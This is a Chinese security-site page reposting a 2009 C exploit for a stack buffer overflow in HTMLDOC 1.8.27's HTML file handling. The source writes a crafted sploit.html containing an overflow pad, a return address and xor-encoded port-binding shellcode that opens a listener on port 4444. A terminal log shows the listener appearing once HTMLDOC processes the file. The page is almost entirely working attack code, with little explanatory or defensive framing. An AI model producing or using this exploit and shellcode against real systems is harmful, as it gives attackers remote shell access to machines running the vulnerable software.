首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit
来源:http://www.pank4j.com 作者:Pankaj 发布时间:2009-09-10  

/*

HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux)
Reference: http://www.securityfocus.com/bid/35727

Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR)
Credit: ANTHRAX666 for finding the vulnerability

Coded by Pankaj Kohli
http://www.pank4j.com

pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space
2
pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f
pankaj@zion:~/test/htmldoc$ ./htmldocb0f

[*] Creating buffer
[*] Exploit file written to sploit.html
Run as: htmldoc -f somefile.pdf sploit.html

pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html &
[1] 3287
pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN

*/

#include <stdio.h>
#include <string.h>


/* Port binding (xor encoded) shellcode (port 4444) */
char code[] =
"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34"
"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05"
"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f"
"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff"
"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f"
"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f"
"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e"
"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff"
"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c"
"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21"
"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d"
"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78"
"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff"
"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5"
"\xd3\x9e";

long jmp = 0x0804d938;  // push esp; ret 0x0807;  ;-)

int main(int argc, char **argv, char **envp) {
 char buff[512];
 int i;
 FILE *fd;

 printf("\n[*] Creating buffer\n");
        strcpy(buff, "<!-- MEDIA SIZE 1x1");
        for(i=0; i<275; i++) {
                buff[19+i] = 'A';
        }

 buff[294] = jmp & 0x000000ff;
 buff[295] = (jmp & 0x0000ff00) >> 8;
 buff[296] = (jmp & 0x00ff0000) >> 16;
 buff[297] = (jmp & 0xff000000) >> 24;
 buff[298] = 0;

 strcat(buff, code);

 fd = fopen("sploit.html", "wb");
 fprintf(fd, "%s", buff);
 fclose(fd);
 printf("[*] Exploit file written to sploit.html\n");
 printf("Run as: htmldoc -f somefile.pdf sploit.html\n\n");

 return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Vista/7 SMB2.0 Negotia
·SIDVault 2.0e Windows Universa
·SMB SRV2.SYS Denial of Service
·Novell eDirectory 8.8 SP5 Remo
·GemStone/S 6.3.1 "stoned" Loca
·Joomla Component BF Survey Pro
·Ipswitch WS_FTP 12 Professiona
·Joomla Component TPDugg 1.1 Bl
·Exploits Windows Vista/7 : SMB
·Agoko CMS <= 0.4 Remote Comman
·Linux 2.4 and 2.6 kernel sock_
·Audio Lib Player (m3u File) Bu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved